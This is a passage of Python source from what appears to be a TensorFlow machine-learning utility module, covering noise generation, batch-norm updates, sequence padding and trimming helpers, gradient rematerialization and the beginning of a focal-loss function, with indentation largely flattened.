seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - batch_norm_stats) * decay
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
bn_update_dict = _get_batch_norm_updates_dict()
assert bn_update.name not in bn_update_dict
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
    A pair of lists. The first list contains all the batch normalization
    updates that are relevant to the loss being optimized, and the second list
    contains the updates in batch_norm_updates that are not in the first list.
"""
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
    assert bn_update.name in bn_update_dict, (
        '%s is probably not a valid batch normalization update op.'
        ' Make sure batch normalization is done through calling'
        ' the py_utils.UpdateBatchNormVars helper routine.' % bn_update.name)
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_KEY = 'sample_step'
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
stack = tf.get_collection_ref(_SAMPLE_STEP_KEY)
try:
stack.append(step)
yield step
finally:
stack.pop()
def _GetSampleStep():
stack = tf.get_collection(_SAMPLE_STEP_KEY)
return stack[-1] if stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: tf.abs(v)**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
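# Illustrative sketch (not part of the original module): a piecewise-constant
# learning-rate schedule keyed off the global step. Boundaries and values are
# arbitrary example numbers.
def _ExamplePiecewiseConstant(global_step):
  # 0.1 until step 1000, 0.01 until step 2000, 0.001 afterwards.
  return PiecewiseConstant(
      global_step, boundaries=[1000, 2000], values=[0.1, 0.01, 0.001],
      vdtype=tf.float32)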
def PadSequenceDimension(x, length, pad_val, shape=None):
"""Pads x to `length` using `pad_val` along the second dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the second dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[1] > length or x.shape[i] != shape[i]
where i != 1.
Args:
x: the tensor to be padded with shape [batch, seq_len, ...].
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[1]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[1][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[1]
pad_len = length - slen
pad = tf.scatter_nd([[1, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[1] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
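# Illustrative sketch (not part of the original module): padding a batch of
# variable-length id sequences out to a fixed maximum length.
def _ExamplePadSequenceDimension():
  ids = tf.constant([[1, 2, 3], [4, 5, 6]], dtype=tf.int32)  # [batch=2, len=3]
  # Pads the second dim from 3 to 5 with zeros, producing shape [2, 5].
  return PadSequenceDimension(ids, length=5, pad_val=0)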
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
  Raises an error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, broadcast=True, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x))
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must be the same shape as 'x' if specified.
broadcast: Whether to broadcast the padding shape to the shape of 'x'. You
almost certainly want this to be true as it matches how padding would be
expanded if applied arithmetically.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.logical_or(tf.equal(padding, 0.0), tf.equal(padding, 1.0))),
[padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros_like(x)
if broadcast:
# Broadcast padding to the full shape.
padding = tf.cast(padding, x.dtype) * tf.ones_like(x)
return tf.where(padding > tf.zeros_like(padding), padded, x)
else:
result = x * tf.cast(1.0 - padding, x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
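# Illustrative sketch (not part of the original module): masking out padded
# time steps of a [batch, time, depth] activation tensor.
def _ExampleApplyPadding():
  x = tf.ones([2, 3, 4], dtype=tf.float32)
  # 0 == keep, 1 == pad; the trailing singleton dim broadcasts over depth.
  padding = tf.constant([[[0.], [0.], [1.]],
                         [[0.], [1.], [1.]]], dtype=tf.float32)
  return ApplyPadding(padding, x)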
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements with the same value gives us num_padded + 1
# and so counting the number that differs gives us num_padded - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
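# Illustrative sketch (not part of the original module): recovering per-example
# sequence lengths from a 0/1 padding matrix.
def _ExampleLengthsFromPaddings():
  paddings = tf.constant([[0., 0., 0., 1., 1.],
                          [0., 0., 0., 0., 0.],
                          [1., 1., 1., 1., 1.]])
  # Evaluates to [3, 5, 0]; an all-padding row yields length 0.
  return LengthsFromPaddings(paddings)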
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
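# Illustrative sketch (not part of the original module): reversing only the
# unpadded prefix of a single time-major sequence.
def _ExampleReversePaddedSequence():
  # [seq_length=4, batch=1, dim=1]; the last step is padding.
  inputs = tf.reshape(tf.constant([1., 2., 3., 0.]), [4, 1, 1])
  paddings = tf.reshape(tf.constant([0., 0., 0., 1.]), [4, 1, 1])
  # The time axis becomes [3, 2, 1, 0]: only the first 3 steps are reversed.
  return ReversePaddedSequence(inputs, paddings)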
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lenghts as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
  # input0 and input1 should have the same batch size and the same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.to_int32(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]))
input1_seq_dim = tf.to_int32(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]))
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(seq_length0,
tf.to_int32(tf.reduce_sum(1.0 - padding0, seq_dim)))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(seq_length1,
tf.to_int32(tf.reduce_sum(1.0 - padding1, seq_dim)))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
# If dim-i is less than shape[i], pads on the right shape[i] -
# dim-i. Otherwise, pads [0, 0] for dim-i.
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
x = tf.pad(x, tf.stack([zeros, pad], axis=1), constant_values=pad_val)
# If dim-i is larger than shape[i], we slice [0:shape[i]] for dim-i.
return tf.reshape(tf.slice(x, zeros, shape), shape)
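# Illustrative sketch (not part of the original module): forcing a tensor to a
# fixed static shape by padding short dims and trimming long ones.
def _ExamplePadOrTrimTo():
  x = tf.ones([2, 5], dtype=tf.float32)
  # Dim 0 is padded from 2 to 3 with -1s; dim 1 is trimmed from 5 to 4.
  return PadOrTrimTo(x, shape=[3, 4], pad_val=-1)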
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
  # [[1, 1, 2, 2, 3, 3], [4, 4, 5, 5, 6, 6]]
  # As a comparison, tf.tile(x, multiples=[1, 2]) gives:
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
    A probabilistic sample from the inputs proportional to the weights. The
    return type will be the same as the return type of the individual
    callables in `inputs`.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random_uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
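# Illustrative sketch (not part of the original module): randomly choosing one
# of two input pipelines per step in a 90/10 ratio. The two lambdas stand in
# for real record streams.
def _ExampleMixByWeight():
  primary = lambda: tf.constant([1, 1, 1])
  secondary = lambda: tf.constant([2, 2, 2])
  batch, source_one_hot = MixByWeight([primary, secondary], [0.9, 0.1])
  return batch, source_one_hot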
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
def Backward(op, *dy):
"""The backward function that rematerializes forward outputs."""
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
# Skip op.inputs[0] which is initial_step_seed.
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in op.inputs[1:]]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
ResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=dy)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return (tf.zeros_like(initial_step_seed),) + tuple(dxs_final)
xs_dtypes = [x.dtype for x in xs]
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
@tf.Defun(initial_step_seed.dtype, *xs_dtypes, python_grad_func=Backward)
def Forward(initial_step_seed, *fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*fwd_xs)
# Some sanity check.
assert not function.get_extra_inputs()
assert not function.get_extra_args()
assert not function.get_extra_vars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = Forward(initial_step_seed, *xs)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
ResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = {
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
}
def StatefulRandomOpsInDefun(func, graph=None):
"""Checks whether the Defun depends on stateful random number ops.
  Stateful random number generator ops should be avoided in Recurrent() calls.
Otherwise, these ops produce inconsistent values between FProp and BProp.
Args:
func: a _DefinedFunction to check.
graph: a Graph. Set None to use the default graph.
Returns:
A list of names of the stateful random ops.
Raises:
InvalidArgumentError: if the input func/graph is invalid.
"""
if not isinstance(func, function._DefinedFunction): # pylint: disable=protected-access
raise tf.errors.InvalidArgumentError(None, None,
'func is not a _DefinedFunction.')
if graph is None:
graph = tf.get_default_graph()
func.add_to_graph(graph)
graph_def = graph.as_graph_def()
# A dict from function name to FunctionDef.
func_defs = {x.signature.name: x for x in graph_def.library.function}
if func.definition.signature.name not in func_defs:
raise tf.errors.InvalidArgumentError(
None, None,
        'Defun {} is not in the graph.'.format(func.definition.signature.name))
stateful_ops = []
# Recursively search for stateful random op.
nodes = py_collections.deque(func.definition.node_def)
while nodes:
node = nodes.pop()
assert isinstance(node, node_def_pb2.NodeDef), node
if node.op in _STATEFUL_RANDOM_OPS:
stateful_ops.append(node.op)
continue
def _AddDefunNodes(func_name):
"""If the given func_name is a Defun, add its sub-nodes into nodes."""
if func_name in func_defs:
nodes.extend(func_defs[func_name].node_def)
# For functional.{While|For|If} ops, add their Defun attr into search.
if node.op == 'While':
_AddDefunNodes(node.attr['body'].func.name)
_AddDefunNodes(node.attr['cond'].func.name)
elif node.op == 'For':
_AddDefunNodes(node.attr['body'].func.name)
elif node.op == 'If':
_AddDefunNodes(node.attr['then_branch'].func.name)
_AddDefunNodes(node.attr['else_branch'].func.name)
else:
# For other op, check whether itself is a Defun op.
_AddDefunNodes(node.op)
return stateful_ops
def ToPlaceholders(nmap, dtype=None):
"""Converts every Tensor in nmap to a placeholder."""
  def _ToPlaceholder(x):
    shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
    return tf.placeholder(dtype=dtype or x.dtype, shape=shape)
  return nmap.Transform(_ToPlaceholder)
def SoftmaxCrossEntropyFocalLoss(logits,
label_ids=None,
label_probs=None,
alpha=None,
gamma=None):
u"""Focal loss for multinomial (softmax) logistic loss.
[1] Focal loss https://arxiv.org/abs/1708.02002
Args:
logits: [..., C]. Logits for the multinomial logistic regression. C is the
number of classes.
label_ids: [...]. Each entry in labels must be an index in [0, C).
label_probs: [..., C]. Each vector along last dimension must be a valid
probability distribution.
alpha: [C]. The weighting factor alpha. Eq (3) in [1].
gamma: []. Tunable focusing parameter. Eq (4) in [1].
Returns:
loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
"""
if label_probs is not None:
log_probs = tf.nn.log_softmax(logits)
loss = -(label_probs * log_probs)
if gamma is not None and gamma != 0:
probs = tf.exp(log_probs)
loss *= tf.pow(1.0 - probs, gamma)
if alpha is not None:
loss *= tf.reshape(
alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
axis=0))
loss = tf.reduce_sum(loss, axis=-1)
else:
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
